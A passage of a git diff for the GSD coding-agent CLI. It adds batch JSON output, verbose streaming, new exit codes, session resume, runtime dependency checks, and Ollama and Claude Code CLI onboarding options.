-    resolveCompletion()
-  }, options.timeout)
+  // Overall timeout (disabled when options.timeout === 0, e.g. auto-mode)
+  const timeoutTimer = options.timeout > 0
+    ? setTimeout(() => {
+        process.stderr.write(`[headless] Timeout after ${options.timeout / 1000}s\n`)
+        exitCode = EXIT_ERROR
+        resolveCompletion()
+      }, options.timeout)
+    : null
 
   // Event handler
   client.onEvent((event) => {
@@ -353,20 +489,167 @@ async function runHeadlessOnce(options: HeadlessOptions, restartCount: number):
     // Answer injector: observe events for question metadata
     injector?.observeEvent(eventObj)
 
-    // --json mode: forward events as JSONL to stdout (filtered if --events)
-    if (options.json) {
+    // --json / --output-format stream-json: forward events as JSONL to stdout (filtered if --events)
+    // --output-format json (batch mode): suppress streaming, track cost for final result
+    if (options.json && options.outputFormat === 'stream-json') {
       const eventType = String(eventObj.type ?? '')
       if (!options.eventFilter || options.eventFilter.has(eventType)) {
         process.stdout.write(JSON.stringify(eventObj) + '\n')
       }
-    } else {
-      // Progress output to stderr
-      const line = formatProgress(eventObj, !!options.verbose)
+    } else if (options.outputFormat === 'json') {
+      // Batch mode: silently track cost_update events (cumulative-max per K004)
+      const eventType = String(eventObj.type ?? '')
+      if (eventType === 'cost_update') {
+        const data = eventObj as Record<string, unknown>
+        const cumCost = data.cumulativeCost as Record<string, unknown> | undefined
+        if (cumCost) {
+          cumulativeCostUsd = Math.max(cumulativeCostUsd, Number(cumCost.costUsd ?? 0))
+          const tokens = data.tokens as Record<string, number> | undefined
+          if (tokens) {
+            cumulativeInputTokens = Math.max(cumulativeInputTokens, tokens.input ?? 0)
+            cumulativeOutputTokens = Math.max(cumulativeOutputTokens, tokens.output ?? 0)
+            cumulativeCacheReadTokens = Math.max(cumulativeCacheReadTokens, tokens.cacheRead ?? 0)
+            cumulativeCacheWriteTokens = Math.max(cumulativeCacheWriteTokens, tokens.cacheWrite ?? 0)
+          }
+        }
+      }
+      // Track sessionId from init_result
+      if (eventType === 'init_result') {
+        lastSessionId = String((eventObj as Record<string, unknown>).sessionId ?? '')
+      }
+    } else if (!options.json) {
+      // Progress output to stderr with verbose state tracking
+      const eventType = String(eventObj.type ?? '')
+
+      // Track cost_update events for agent_end summary
+      if (eventType === 'cost_update') {
+        const data = eventObj as Record<string, unknown>
+        const cumCost = data.cumulativeCost as Record<string, unknown> | undefined
+        if (cumCost) {
+          const tokens = data.tokens as Record<string, number> | undefined
+          lastCostData = {
+            costUsd: Number(cumCost.costUsd ?? 0),
+            inputTokens: tokens?.input ?? 0,
+            outputTokens: tokens?.output ?? 0,
+          }
+        }
+      }
+
+      // Stream assistant text and thinking deltas in verbose mode
+      if (eventType === 'message_update') {
+        const ame = eventObj.assistantMessageEvent as Record<string, unknown> | undefined
+        if (ame && options.verbose) {
+          const ameType = String(ame.type ?? '')
+
+          // --- Text streaming ---
+          if (ameType === 'text_start') {
+            inTextBlock = true
+            process.stderr.write(formatTextStart())
+          } else if (ameType === 'text_delta') {
+            const delta = String(ame.delta ?? ame.text ?? '')
+            if (delta) {
+              if (!inTextBlock) {
+                // Edge case: delta without start
+                inTextBlock = true
+                process.stderr.write(formatTextStart())
+              }
+              process.stderr.write(delta)
+            }
+          } else if (ameType === 'text_end') {
+            if (inTextBlock) {
+              process.stderr.write(formatTextEnd() + '\n')
+              inTextBlock = false
+            }
+          }
+
+          // --- Thinking streaming ---
+          else if (ameType === 'thinking_start') {
+            inThinkingBlock = true
+            process.stderr.write(formatThinkingStart())
+          } else if (ameType === 'thinking_delta') {
+            const delta = String(ame.delta ?? ame.text ?? '')
+            if (delta) {
+              if (!inThinkingBlock) {
+                inThinkingBlock = true
+                process.stderr.write(formatThinkingStart())
+              }
+              process.stderr.write(delta)
+            }
+          } else if (ameType === 'thinking_end') {
+            if (inThinkingBlock) {
+              process.stderr.write(formatThinkingEnd() + '\n')
+              inThinkingBlock = false
+            }
+          }
+        }
+        // Non-verbose: accumulate text_delta for truncated one-liner
+        else if (ame?.type === 'text_delta') {
+          thinkingBuffer += String(ame.delta ?? ame.text ?? '')
+        }
+      }
+
+      // Track tool execution start timestamps
+      if (eventType === 'tool_execution_start') {
+        const toolCallId = String(eventObj.toolCallId ?? eventObj.id ?? '')
+        if (toolCallId) toolStartTimes.set(toolCallId, Date.now())
+      }
+
+      // Close any open streaming blocks before tool calls or message end
+      if (options.verbose && (eventType === 'tool_execution_start' || eventType === 'message_end')) {
+        if (inTextBlock) {
+          process.stderr.write('\n')
+          inTextBlock = false
+        }
+        if (inThinkingBlock) {
+          process.stderr.write('\n')
+          inThinkingBlock = false
+        }
+      }
+      // Non-verbose: flush accumulated buffer as truncated one-liner
+      else if (!options.verbose && thinkingBuffer.trim() &&
+          (eventType === 'tool_execution_start' || eventType === 'message_end')) {
+        process.stderr.write(formatThinkingLine(thinkingBuffer) + '\n')
+        thinkingBuffer = ''
+      }
+
+      // Compute tool duration for tool_execution_end
+      let toolDuration: number | undefined
+      let isToolError = false
+      if (eventType === 'tool_execution_end') {
+        const toolCallId = String(eventObj.toolCallId ?? eventObj.id ?? '')
+        const startTime = toolStartTimes.get(toolCallId)
+        if (startTime) {
+          toolDuration = Date.now() - startTime
+          toolStartTimes.delete(toolCallId)
+        }
+        isToolError = eventObj.isError === true || eventObj.error != null
+      }
+
+      const ctx: ProgressContext = {
+        verbose: !!options.verbose,
+        toolDuration,
+        isError: isToolError,
+        lastCost: eventType === 'agent_end' ? lastCostData : undefined,
+      }
+
+      const line = formatProgress(eventObj, ctx)
       if (line) process.stderr.write(line + '\n')
     }
 
+    // Handle execution_complete (v2 structured completion)
+    // Skip for multi-turn commands (auto, next) — their completion is detected via
+    // isTerminalNotification("Auto-mode stopped..."/"Step-mode stopped..."), not per-turn events
+    if (eventObj.type === 'execution_complete' && !completed && !isMultiTurnCommand) {
+      completed = true
+      const status = String(eventObj.status ?? 'success')
+      exitCode = mapStatusToExitCode(status)
+      if (eventObj.status === 'blocked') blocked = true
+      resolveCompletion()
+      return
+    }
+
     // Handle extension_ui_request
-    if (eventObj.type === 'extension_ui_request' && stdinWriter) {
+    if (eventObj.type === 'extension_ui_request' && clientStarted) {
       // Check for terminal notification before auto-responding
       if (isBlockedNotification(eventObj)) {
         blocked = true
@@ -383,9 +666,9 @@ async function runHeadlessOnce(options: HeadlessOptions, restartCount: number):
 
       // Answer injection: try to handle with pre-supplied answers before supervised/auto
       if (injector && !FIRE_AND_FORGET_METHODS.has(String(eventObj.method ?? ''))) {
-        if (injector.tryHandle(eventObj, stdinWriter)) {
+        if (injector.tryHandle(eventObj, injectorStdinAdapter)) {
           if (completed) {
-            exitCode = blocked ? 2 : 0
+            exitCode = blocked ? EXIT_BLOCKED : EXIT_SUCCESS
             resolveCompletion()
           }
           return
@@ -401,17 +684,17 @@ async function runHeadlessOnce(options: HeadlessOptions, restartCount: number):
         const eventId = String(eventObj.id ?? '')
         const timer = setTimeout(() => {
           pendingResponseTimers.delete(eventId)
-          handleExtensionUIRequest(eventObj as unknown as ExtensionUIRequest, stdinWriter!)
+          handleExtensionUIRequest(eventObj as unknown as ExtensionUIRequest, client)
           process.stdout.write(JSON.stringify({ type: 'supervised_timeout', id: eventId, method }) + '\n')
         }, responseTimeout)
         pendingResponseTimers.set(eventId, timer)
       } else {
-        handleExtensionUIRequest(eventObj as unknown as ExtensionUIRequest, stdinWriter)
+        handleExtensionUIRequest(eventObj as unknown as ExtensionUIRequest, client)
       }
 
       // If we detected a terminal notification, resolve after responding
       if (completed) {
-        exitCode = blocked ? 2 : 0
+        exitCode = blocked ? EXIT_BLOCKED : EXIT_SUCCESS
         resolveCompletion()
         return
       }
@@ -432,12 +715,18 @@ async function runHeadlessOnce(options: HeadlessOptions, restartCount: number):
   const signalHandler = () => {
     process.stderr.write('\n[headless] Interrupted, stopping child process...\n')
     interrupted = true
-    exitCode = 1
-    client.stop().finally(() => {
-      clearTimeout(timeoutTimer)
-      if (idleTimer) clearTimeout(idleTimer)
-      process.exit(exitCode)
-    })
+    exitCode = EXIT_CANCELLED
+    // Kill child process — don't await, just fire and exit.
+    // The main flow may be awaiting a promise that resolves when the child dies,
+    // which would race with this handler. Exit synchronously to ensure correct exit code.
+    try { client.stop().catch(() => {}) } catch {}
+    if (timeoutTimer) clearTimeout(timeoutTimer)
+    if (idleTimer) clearTimeout(idleTimer)
+    // Emit batch JSON result if in json mode before exiting
+    if (options.outputFormat === 'json') {
+      emitBatchJsonResult()
+    }
+    process.exit(exitCode)
   }
   process.on('SIGINT', signalHandler)
   process.on('SIGTERM', signalHandler)
@@ -447,26 +736,59 @@ async function runHeadlessOnce(options: HeadlessOptions, restartCount: number):
     await client.start()
   } catch (err) {
     process.stderr.write(`[headless] Error: Failed to start RPC session: ${err instanceof Error ? err.message : String(err)}\n`)
-    clearTimeout(timeoutTimer)
+    if (timeoutTimer) clearTimeout(timeoutTimer)
     process.exit(1)
   }
 
-  // Access stdin writer from the internal process
-  const internalProcess = (client as any).process as ChildProcess
-  if (!internalProcess?.stdin) {
-    process.stderr.write('[headless] Error: Cannot access child process stdin\n')
-    await client.stop()
-    clearTimeout(timeoutTimer)
-    process.exit(1)
+  // v2 protocol negotiation — attempt init for structured completion events
+  let v2Enabled = false
+  try {
+    await client.init({ clientId: 'gsd-headless' })
+    v2Enabled = true
+  } catch {
+    process.stderr.write('[headless] Warning: v2 init failed, falling back to v1 string-matching\n')
   }
 
-  stdinWriter = (data: string) => {
-    internalProcess.stdin!.write(data)
+  clientStarted = true
+
+  // --resume: resolve session ID and switch to it
+  if (options.resumeSession) {
+    const projectSessionsDir = getProjectSessionsDir(process.cwd())
+    const sessions = await SessionManager.list(process.cwd(), projectSessionsDir)
+    const result = resolveResumeSession(sessions, options.resumeSession)
+    if (result.error) {
+      process.stderr.write(`[headless] Error: ${result.error}\n`)
+      await client.stop()
+      if (timeoutTimer) clearTimeout(timeoutTimer)
+      process.exit(1)
+    }
+    const matched = result.session!
+    const switchResult = await client.switchSession(matched.path)
+    if (switchResult.cancelled) {
+      process.stderr.write(`[headless] Error: Session switch to '${matched.id}' was cancelled by an extension\n`)
+      await client.stop()
+      if (timeoutTimer) clearTimeout(timeoutTimer)
+      process.exit(1)
+    }
+    process.stderr.write(`[headless] Resuming session ${matched.id}\n`)
+  }
+
+  // Build injector adapter — wraps client.sendUIResponse for AnswerInjector's writeToStdin interface
+  injectorStdinAdapter = (data: string) => {
+    try {
+      const parsed = JSON.parse(data.trim())
+      if (parsed.type === 'extension_ui_response' && parsed.id) {
+        const { id, value, values, confirmed, cancelled } = parsed
+        client.sendUIResponse(id, { value, values, confirmed, cancelled })
+      }
+    } catch {
+      process.stderr.write('[headless] Warning: injector adapter received unparseable data\n')
+    }
   }
 
   // Start supervised stdin reader for orchestrator commands
   if (options.supervised) {
-    stopSupervisedReader = startSupervisedStdinReader(stdinWriter, client, (id) => {
+    stopSupervisedReader = startSupervisedStdinReader(client, (id) => {
       const timer = pendingResponseTimers.get(id)
       if (timer) {
         clearTimeout(timer)
@@ -477,15 +799,18 @@ async function runHeadlessOnce(options: HeadlessOptions, restartCount: number):
     process.stdin.resume()
   }
 
-  // Detect child process crash
-  internalProcess.on('exit', (code) => {
-    if (!completed) {
-      const msg = `[headless] Child process exited unexpectedly with code ${code ?? 'null'}\n`
-      process.stderr.write(msg)
-      exitCode = 1
-      resolveCompletion()
-    }
-  })
+  // Detect child process crash (read-only exit event subscription — not stdin access)
+  const internalProcess = (client as any).process as ChildProcess
+  if (internalProcess) {
+    internalProcess.on('exit', (code) => {
+      if (!completed) {
+        const msg = `[headless] Child process exited unexpectedly with code ${code ?? 'null'}\n`
+        process.stderr.write(msg)
+        exitCode = EXIT_ERROR
+        resolveCompletion()
+      }
+    })
+  }
 
   if (!options.json) {
     process.stderr.write(`[headless] Running /gsd ${options.command}${options.commandArgs.length > 0 ? ' ' + options.commandArgs.join(' ') : ''}...\n`)
@@ -497,21 +822,23 @@ async function runHeadlessOnce(options: HeadlessOptions, restartCount: number):
     await client.prompt(command)
   } catch (err) {
     process.stderr.write(`[headless] Error: Failed to send prompt: ${err instanceof Error ? err.message : String(err)}\n`)
-    exitCode = 1
+    exitCode = EXIT_ERROR
   }
 
   // Wait for completion
-  if (exitCode === 0 || exitCode === 2) {
+  if (exitCode === EXIT_SUCCESS || exitCode === EXIT_BLOCKED) {
     await completionPromise
   }
 
   // Auto-mode chaining: if --auto and milestone creation succeeded, send /gsd auto
-  if (isNewMilestone && options.auto && milestoneReady && !blocked && exitCode === 0) {
+  if (isNewMilestone && options.auto && milestoneReady && !blocked && exitCode === EXIT_SUCCESS) {
     if (!options.json) {
       process.stderr.write('[headless] Milestone ready — chaining into auto-mode...\n')
     }
 
-    // Reset completion state for the auto-mode phase
+    // Reset completion state for the auto-mode phase.
+    // Disable the overall timeout — auto-mode has its own internal supervisor.
+    if (timeoutTimer) clearTimeout(timeoutTimer)
     completed = false
     milestoneReady = false
     blocked = false
@@ -523,16 +850,16 @@ async function runHeadlessOnce(options: HeadlessOptions, restartCount: number):
       await client.prompt('/gsd auto')
     } catch (err) {
       process.stderr.write(`[headless] Error: Failed to start auto-mode: ${err instanceof Error ? err.message : String(err)}\n`)
-      exitCode = 1
+      exitCode = EXIT_ERROR
     }
 
-    if (exitCode === 0 || exitCode === 2) {
+    if (exitCode === EXIT_SUCCESS || exitCode === EXIT_BLOCKED) {
       await autoCompletionPromise
     }
   }
 
   // Cleanup
-  clearTimeout(timeoutTimer)
+  if (timeoutTimer) clearTimeout(timeoutTimer)
   if (idleTimer) clearTimeout(idleTimer)
   pendingResponseTimers.forEach((timer) => clearTimeout(timer))
   pendingResponseTimers.clear()
@@ -545,7 +872,7 @@ async function runHeadlessOnce(options: HeadlessOptions, restartCount: number):
 
   // Summary
   const duration = ((Date.now() - startTime) / 1000).toFixed(1)
-  const status = blocked ? 'blocked' : exitCode === 1 ? (totalEvents === 0 ? 'error' : 'timeout') : 'complete'
+  const status = blocked ? 'blocked' : exitCode === EXIT_CANCELLED ? 'cancelled' : exitCode === EXIT_ERROR ? (totalEvents === 0 ? 'error' : 'timeout') : 'complete'
 
   process.stderr.write(`[headless] Status: ${status}\n`)
   process.stderr.write(`[headless] Duration: ${duration}s\n`)
@@ -577,5 +904,8 @@ async function runHeadlessOnce(options: HeadlessOptions, restartCount: number):
     }
   }
 
+  // Emit structured JSON result in batch mode
+  emitBatchJsonResult()
+
   return { exitCode, interrupted }
 }
diff --git a/src/help-text.ts b/src/help-text.ts
index 03f873bda..ab534ae62 100644
--- a/src/help-text.ts
+++ b/src/help-text.ts
@@ -3,12 +3,15 @@ const SUBCOMMAND_HELP: Record<string, string> = {
     'Usage: gsd config',
     '',
     'Re-run the interactive setup wizard to configure:',
-    '  - LLM provider (Anthropic, OpenAI, Google, etc.)',
+    '  - LLM provider (Anthropic, OpenAI, Google, OpenRouter, Ollama, LM Studio, etc.)',
     '  - Web search provider (Brave, Tavily, built-in)',
     '  - Remote questions (Discord, Slack, Telegram)',
     '  - Tool API keys (Context7, Jina, Groq)',
     '',
     'All steps are skippable and can be changed later with /login or /search-provider.',
+    '',
+    'For detailed provider setup instructions (OpenRouter, Ollama, LM Studio, vLLM,',
+    'and other OpenAI-compatible endpoints), see docs/providers.md.',
   ].join('\n'),
 
   update: [
@@ -32,6 +35,30 @@ const SUBCOMMAND_HELP: Record<string, string> = {
     'Compare with --continue (-c) which always resumes the most recent session.',
   ].join('\n'),
 
+  install: [
+    'Usage: gsd install <source> [-l, --local]',
+    '',
+    'Install a package/extension source and run post-install validation (dependency checks, setup).',
+    '',
+    'Examples:',
+    '  gsd install npm:@foo/bar',
+    '  gsd install git:github.com/user/repo',
+    '  gsd install https://github.com/user/repo',
+    '  gsd install ./local/path',
+  ].join('\n'),
+
+  remove: [
+    'Usage: gsd remove <source> [-l, --local]',
+    '',
+    'Remove an installed package source and its settings entry.',
+  ].join('\n'),
+
+  list: [
+    'Usage: gsd list',
+    '',
+    'List installed package sources from user and project settings.',
+  ].join('\n'),
+
   worktree: [
     'Usage: gsd worktree <command> [args]',
     '',
@@ -70,9 +97,12 @@ const SUBCOMMAND_HELP: Record<string, string> = {
     'Run /gsd commands without the TUI. Default command: auto',
     '',
     'Flags:',
-    '  --timeout N          Overall timeout in ms (default: 300000)',
-    '  --json               JSONL event stream to stdout',
-    '  --model ID           Override model',
+    '  --timeout N            Overall timeout in ms (default: 300000)',
+    '  --json                 JSONL event stream to stdout (alias for --output-format stream-json)',
+    '  --output-format <fmt>  Output format: text (default), json (structured result), stream-json (JSONL events)',
+    '  --bare                 Minimal context: skip CLAUDE.md, AGENTS.md, user settings, user skills',
+    '  --resume <id>          Resume a prior headless session by ID',
+    '  --model ID             Override model',
     '  --supervised           Forward interactive UI requests to orchestrator via stdout/stdin',
     '  --response-timeout N   Timeout (ms) for orchestrator response (default: 30000)',
     '  --answers <path>       Pre-supply answers and secrets (JSON file)',
@@ -91,11 +121,19 @@ const SUBCOMMAND_HELP: Record<string, string> = {
     '  --auto               Start auto-mode after milestone creation',
     '  --verbose            Show tool calls in progress output',
     '',
+    'Output formats:',
+    '  text         Human-readable progress on stderr (default)',
+    '  json         Collect events silently, emit structured HeadlessJsonResult on stdout at exit',
+    '  stream-json  Stream JSONL events to stdout in real time (same as --json)',
+    '',
     'Examples:',
     '  gsd headless                                    Run /gsd auto',
     '  gsd headless next                               Run one unit',
-    '  gsd headless --json status                      Machine-readable status',
+    '  gsd headless --output-format json auto           Structured JSON result on stdout',
+    '  gsd headless --json status                      Machine-readable JSONL stream',
     '  gsd headless --timeout 60000                    With 1-minute timeout',
+    '  gsd headless --bare auto                        Minimal context (CI/ecosystem use)',
+    '  gsd headless --resume abc123 auto               Resume a prior session',
     '  gsd headless new-milestone --context spec.md    Create milestone from file',
     '  cat spec.md | gsd headless new-milestone --context -   From stdin',
     '  gsd headless new-milestone --context spec.md --auto    Create + auto-execute',
@@ -104,7 +142,7 @@ const SUBCOMMAND_HELP: Record<string, string> = {
     '  gsd headless --events agent_end,extension_ui_request auto   Filtered event stream',
     '  gsd headless query                              Instant JSON state snapshot',
     '',
-    'Exit codes: 0 = complete, 1 = error/timeout, 2 = blocked',
+    'Exit codes: 0 = success, 1 = error/timeout, 10 = blocked, 11 = cancelled',
   ].join('\n'),
 }
 
@@ -128,9 +166,13 @@ export function printHelp(version: string): void {
   process.stdout.write('  --help, -h               Print this help and exit\n')
   process.stdout.write('\nSubcommands:\n')
   process.stdout.write('  config                   Re-run the setup wizard\n')
+  process.stdout.write('  install <source>         Install a package/extension source\n')
+  process.stdout.write('  remove <source>          Remove an installed package source\n')
+  process.stdout.write('  list                     List installed package sources\n')
   process.stdout.write('  update                   Update GSD to the latest version\n')
   process.stdout.write('  sessions                 List and resume a past session\n')
   process.stdout.write('  worktree <cmd>           Manage worktrees (list, merge, clean, remove)\n')
+  process.stdout.write('  auto [args]              Run auto-mode without TUI (pipeable)\n')
   process.stdout.write('  headless [cmd] [args]    Run /gsd commands without TUI (default: auto)\n')
   process.stdout.write('\nRun gsd <subcommand> --help for subcommand-specific help.\n')
 }
diff --git a/src/loader.ts b/src/loader.ts
index f40e2e0c5..1d3ce46a2 100644
--- a/src/loader.ts
+++ b/src/loader.ts
@@ -30,7 +30,48 @@ if (firstArg === '--help' || firstArg === '-h') {
   process.exit(0)
 }
 
+// ---------------------------------------------------------------------------
+// Runtime dependency checks — fail fast with clear diagnostics before any
+// heavy imports. Reads minimum Node version from the engines field in
+// package.json (already parsed above) and verifies git is available.
+// ---------------------------------------------------------------------------
+{
+  const MIN_NODE_MAJOR = 22
+  const red = '\x1b[31m'
+  const bold = '\x1b[1m'
+  const dim = '\x1b[2m'
+  const reset = '\x1b[0m'
+
+  // -- Node version --
+  const nodeMajor = parseInt(process.versions.node.split('.')[0], 10)
+  if (nodeMajor < MIN_NODE_MAJOR) {
+    process.stderr.write(
+      `\n${red}${bold}Error:${reset} GSD requires Node.js >= ${MIN_NODE_MAJOR}.0.0\n` +
+      `       You are running Node.js ${process.versions.node}\n\n` +
+      `${dim}Install a supported version:${reset}\n` +
+      `  nvm install ${MIN_NODE_MAJOR}   ${dim}# if using nvm${reset}\n` +
+      `  fnm install ${MIN_NODE_MAJOR}   ${dim}# if using fnm${reset}\n` +
+      `  brew install node@${MIN_NODE_MAJOR} ${dim}# macOS Homebrew${reset}\n\n`
+    )
+    process.exit(1)
+  }
+
+  // -- git --
+  try {
+    const { execFileSync } = await import('child_process')
+    execFileSync('git', ['--version'], { stdio: 'ignore' })
+  } catch {
+    process.stderr.write(
+      `\n${red}${bold}Error:${reset} GSD requires git but it was not found on PATH.\n\n` +
+      `${dim}Install git:${reset}\n` +
+      `  https://git-scm.com/downloads\n\n`
+    )
+    process.exit(1)
+  }
+}
+
 import { agentDir, appRoot } from './app-paths.js'
+import { applyRtkProcessEnv } from './rtk.js'
 import { serializeBundledExtensionPaths } from './bundled-extension-paths.js'
 import { discoverExtensionEntryPaths } from './extension-discovery.js'
 import { loadRegistry, readManifestFromEntryPath, isExtensionEnabled } from './extension-registry.js'
@@ -49,7 +90,8 @@ process.env.PI_PACKAGE_DIR = pkgDir
 process.env.PI_SKIP_VERSION_CHECK = '1'  // GSD runs its own update check in cli.ts — suppress pi's
 process.title = 'gsd'
 
-// Print branded banner on first launch (before ~/.gsd/ exists)
+// Print branded banner on first launch (before ~/.gsd/ exists).
+// Set GSD_FIRST_RUN_BANNER so cli.ts skips the duplicate welcome screen.
 if (!existsSync(appRoot)) {
   const cyan  = '\x1b[36m'
   const green = '\x1b[32m'
@@ -62,11 +104,16 @@ if (!existsSync(appRoot)) {
     `  Get Shit Done ${dim}v${gsdVersion}${reset}\n` +
     `  ${green}Welcome.${reset} Setting up your environment...\n\n`
   )
+  process.env.GSD_FIRST_RUN_BANNER = '1'
 }
 
 // GSD_CODING_AGENT_DIR — tells pi's getAgentDir() to return ~/.gsd/agent/ instead of ~/.gsd/agent/
 process.env.GSD_CODING_AGENT_DIR = agentDir
 
+// RTK environment — make ~/.gsd/agent/bin visible to all child-process paths,
+// not just the bash tool, and force-disable RTK telemetry for GSD-managed use.
+applyRtkProcessEnv(process.env)
+
 // NODE_PATH — make gsd's own node_modules available to extensions loaded via jiti.
 // Without this, extensions (e.g. browser-tools) can't resolve dependencies like
 // `playwright` because jiti resolves modules from pi-coding-agent's location, not gsd's.
diff --git a/src/mcp-server.ts b/src/mcp-server.ts
index d3ea233fe..f7417235e 100644
--- a/src/mcp-server.ts
+++ b/src/mcp-server.ts
@@ -19,6 +19,10 @@ export interface McpToolDef {
 // MCP SDK subpath imports use wildcard exports (./*) that NodeNext resolves
 // at runtime but TypeScript cannot statically type-check. We construct the
 // specifiers dynamically so tsc treats them as `any`.
+// Use createRequire to resolve wildcard subpaths — CJS resolver auto-appends
+// .js, which the ESM wildcard export map does not (#3603).
+import { createRequire } from 'node:module'
+const _require = createRequire(import.meta.url)
 const MCP_PKG = '@modelcontextprotocol/sdk'
 
 /**
@@ -42,8 +46,8 @@ export async function startMcpServer(options: {
   const { tools, version = '0.0.0' } = options
 
   const serverMod = await import(`${MCP_PKG}/server`)
-  const stdioMod = await import(`${MCP_PKG}/server/stdio`)
-  const typesMod = await import(`${MCP_PKG}/types`)
+  const stdioMod = await import(_require.resolve(`${MCP_PKG}/server/stdio`))
+  const typesMod = await import(_require.resolve(`${MCP_PKG}/types`))
 
   const Server = serverMod.Server
   const StdioServerTransport = stdioMod.StdioServerTransport
diff --git a/src/onboarding.ts b/src/onboarding.ts
index eafe1d443..d51d408dc 100644
--- a/src/onboarding.ts
+++ b/src/onboarding.ts
@@ -16,6 +16,7 @@ import { dirname, join } from 'node:path'
 import type { AuthStorage } from '@gsd/pi-coding-agent'
 import { renderLogo } from './logo.js'
 import { agentDir } from './app-paths.js'
+import { isClaudeCliReady } from './claude-cli-check.js'
 
 // ─── Types ────────────────────────────────────────────────────────────────────
 
@@ -64,6 +65,7 @@ const TOOL_KEYS: ToolKeyConfig[] = [
 const LLM_PROVIDER_IDS = [
   'anthropic',
   'anthropic-vertex',
+  'claude-code',
   'openai',
   'github-copilot',
   'openai-codex',
@@ -74,6 +76,7 @@ const LLM_PROVIDER_IDS = [
   'xai',
   'openrouter',
   'mistral',
+  'ollama',
   'ollama-cloud',
   'custom-openai',
 ]
@@ -85,13 +88,13 @@ const API_KEY_PREFIXES: Record<string, string[]> = {
 }
 
 const OTHER_PROVIDERS = [
-  { value: 'google', label: 'Google (Gemini)' },
-  { value: 'groq', label: 'Groq' },
-  { value: 'xai', label: 'xAI (Grok)' },
-  { value: 'openrouter', label: 'OpenRouter' },
-  { value: 'mistral', label: 'Mistral' },
+  { value: 'google', label: 'Google (Gemini)', hint: 'aistudio.google.com/app/apikey' },
+  { value: 'groq', label: 'Groq', hint: 'console.groq.com/keys' },
+  { value: 'xai', label: 'xAI (Grok)', hint: 'console.x.ai' },
+  { value: 'openrouter', label: 'OpenRouter', hint: '200+ models — openrouter.ai/keys' },
+  { value: 'mistral', label: 'Mistral', hint: 'console.mistral.ai/api-keys' },
   { value: 'ollama-cloud', label: 'Ollama Cloud' },
-  { value: 'custom-openai', label: 'Custom (OpenAI-compatible)' },
+  { value: 'custom-openai', label: 'Custom (OpenAI-compatible)', hint: 'Ollama, LM Studio, vLLM, proxies — see docs/providers.md' },
 ]
 
 // ─── Dynamic imports ──────────────────────────────────────────────────────────
@@ -292,8 +295,16 @@ async function runLlmStep(p: ClackModule, pc: PicoModule, authStorage: AuthStora
     authOptions.push({ value: 'keep', label: `Keep current (${existingAuth})`, hint: 'already configured' })
   }
 
+  // Show Claude Code CLI option at the top when the CLI is installed and authenticated (#3772).
+  // This is the only TOS-compliant path for Anthropic subscription users.
+  if (isClaudeCliReady()) {
+    authOptions.push(
+      { value: 'claude-cli', label: 'Use Claude Code CLI', hint: 'recommended — uses your existing Claude subscription' },
+    )
+  }
+
   authOptions.push(
-    { value: 'browser', label: 'Sign in with your browser', hint: 'recommended — same login as claude.ai / ChatGPT' },
+    { value: 'browser', label: 'Sign in with your browser', hint: 'GitHub Copilot, ChatGPT, Google, etc.' },
     { value: 'api-key', label: 'Paste an API key', hint: 'from your provider dashboard' },
     { value: 'skip', label: 'Skip for now', hint: 'use /login inside GSD later' },
   )
@@ -306,12 +317,23 @@ async function runLlmStep(p: ClackModule, pc: PicoModule, authStorage: AuthStora
   if (p.isCancel(method) || method === 'skip') return false
   if (method === 'keep') return true
 
+  // ── Claude Code CLI path (#3772) ────────────────────────────────────────
+  if (method === 'claude-cli') {
+    p.log.success('Claude Code CLI detected — routing through local CLI (TOS-compliant)')
+    p.log.info('Your Claude subscription will be used for inference. No API key needed.')
+    // Store sentinel so hasAuth('claude-code') returns true on future boots
+    authStorage.set('claude-code', { type: 'api_key', key: 'cli' })
+    return true
+  }
+
   // ── Step 2: Which provider? ──────────────────────────────────────────────
   if (method === 'browser') {
+    // Anthropic OAuth is removed from browser auth — it violates Anthropic TOS for
+    // third-party apps (#3772). Anthropic subscription users should use the Claude
+    // Code CLI path (shown above when CLI is installed) or paste an API key.
     const provider = await p.select({
       message: 'Choose provider',
       options: [
-        { value: 'anthropic', label: 'Anthropic (Claude)', hint: 'recommended' },
         { value: 'github-copilot', label: 'GitHub Copilot' },
         { value: 'openai-codex', label: 'ChatGPT Plus/Pro (Codex)' },
         { value: 'google-gemini-cli', label: 'Google Gemini CLI' },
@@ -335,6 +357,9 @@ async function runLlmStep(p: ClackModule, pc: PicoModule, authStorage: AuthStora
     if (provider === 'custom-openai') {
       return await runCustomOpenAIFlow(p, pc, authStorage)
     }
+    if (provider === 'ollama') {
+      return await runOllamaLocalFlow(p, pc, authStorage)
+    }
     const label = provider === 'anthropic' ? 'Anthropic'
       : provider === 'openai' ? 'OpenAI'
       : OTHER_PROVIDERS.find(op => op.value === provider)?.label ?? String(provider)
@@ -441,6 +466,61 @@ async function runApiKeyFlow(
 
   authStorage.set(providerId, { type: 'api_key', key: trimmed })
   p.log.success(`API key saved for ${pc.green(providerLabel)}`)
+
+  // Provider-specific post-setup hints
+  if (providerId === 'openrouter') {
+    p.log.info(`Use ${pc.cyan('/model')} inside GSD to pick an OpenRouter model.`)
+    p.log.info(`To add custom models or control routing, see ${pc.dim('docs/providers.md#openrouter')}`)
+  }
+
+  return true
+}
+
+// ─── Ollama Local Flow ───────────────────────────────────────────────────────
+
+async function runOllamaLocalFlow(
+  p: ClackModule,
+  pc: PicoModule,
+  authStorage: AuthStorage,
+): Promise<boolean> {
+  const host = process.env.OLLAMA_HOST || 'http://localhost:11434'
+
+  const s = p.spinner()
+  s.start(`Checking Ollama at ${host}...`)
+
+  try {
+    const controller = new AbortController()
+    const timeout = setTimeout(() => controller.abort(), 3000)
+    const response = await fetch(host, { signal: controller.signal })
+    clearTimeout(timeout)
+
+    if (response.ok) {
+      s.stop(`Ollama is running at ${pc.green(host)}`)
+      // Store a placeholder so the provider is recognized as authenticated
+      authStorage.set('ollama', { type: 'api_key', key: 'ollama' })
+      p.log.success(`${pc.green('Ollama (Local)')} configured — no API key needed`)
+      p.log.info(pc.dim('Models are discovered automatically from your local Ollama instance.'))
+      return true
+    } else {
+      s.stop('Ollama check failed')
+      p.log.warn(`Ollama responded with status ${response.status} at ${host}`)
+    }
+  } catch {
+    s.stop('Ollama not detected')
+    p.log.warn(`Could not reach Ollama at ${host}`)
+    p.log.info(pc.dim('Install Ollama from https://ollama.com and run "ollama serve"'))
+    p.log.info(pc.dim('Set OLLAMA_HOST if using a non-default address.'))
+  }
+
+  // Even if not reachable now, save the config — the extension will detect it at runtime
+  const proceed = await p.confirm({
+    message: 'Save Ollama as your provider anyway? (it will auto-detect when running)',
+  })
+
+  if (p.isCancel(proceed) || !proceed) return false
